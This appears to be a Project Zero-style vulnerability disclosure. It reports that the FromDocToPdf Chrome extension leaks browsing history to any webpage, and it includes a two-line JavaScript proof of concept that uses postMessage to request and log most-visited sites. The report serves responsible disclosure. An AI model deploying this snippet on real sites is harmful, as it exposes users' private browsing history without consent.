FromDocToPdf: exposes browsing history to all websites 




I noticed this extension with 20 million users:

<a href="https://chrome.google.com/webstore/detail/fromdoctopdf/mallpejgeafdahhflmliiahjdpgbegpk/internal?hl=en-US" title="" class="" rel="nofollow">https://chrome.google.com/webstore/detail/fromdoctopdf/mallpejgeafdahhflmliiahjdpgbegpk/internal?hl=en-US</a>

The extensions is pretty low quality, thankfully a lot of the scarier stuff seems to be disabled in Chrome, but it does expose browsing history to all pages (!!), any website can do this:

> window.addEventListener("message", function(msg) { JSON.parse(msg.data).data.forEach(function(a) { console.log(a.title, a.url);}) })
> window.postMessage(JSON.stringify({destination: "mallpejgeafdahhflmliiahjdpgbegpk", cmd: "mostVisitedSites"}), "*")
Example Domain <a href="http://www.example.com/" title="" class="" rel="nofollow">http://www.example.com/</a>
Hacker News <a href="http://news.ycombinator.com/" title="" class="" rel="nofollow">http://news.ycombinator.com/</a>
...

As far as I can tell, this is can't be used for anything other than leaking private data, so filing as low priority. I notified the CWS team, although I'm not sure how this extension managed to get 20M users, perhaps that requires some investigation.


If the PoC is large, feel free to attach it as an attachment.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: taviso